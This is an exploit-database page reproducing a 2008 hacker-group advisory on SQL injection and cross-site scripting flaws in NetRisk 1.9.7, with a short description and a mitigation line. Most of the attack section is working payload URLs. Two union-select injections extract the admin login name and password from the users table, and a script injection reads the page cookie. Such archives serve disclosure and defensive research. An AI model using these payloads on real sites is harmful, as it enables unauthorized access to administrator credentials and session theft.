header-logo
Suggest Exploit
vendor:
NetRisk
by:
Virangar Security Team
7.5
CVSS
HIGH
SQL Injection/XSS
89, 79
CWE
Product Name: NetRisk
Affected Version From: 1.9.2007
Affected Version To: 1.9.2007
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

NetRisk 1.9.7 Multiple Remote Vulnerabilities

NetRisk contains of other SQL Injection/XSS/LFI bugs in other pages. An attacker can exploit these vulnerabilities to gain access to sensitive information such as login credentials and cookies.

Mitigation:

Input validation should be used to prevent SQL Injection and XSS attacks.
Source

Exploit-DB raw data:

   ####################################################################
   #                                                                  #
   #  ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::....  #
   #                        (sql injection/xss)                       #           
   ####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi)
---------------------------------
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vlues:

1.sql injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,pass,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
########################
2.xss:
http://site.com/patch/index.php?page=<script>alert(document.cookie)</script>

########################
NetRisk contains of  other sql injecton/xss/LFI  bugs in other pages ;)

# milw0rm.com [2008-01-06]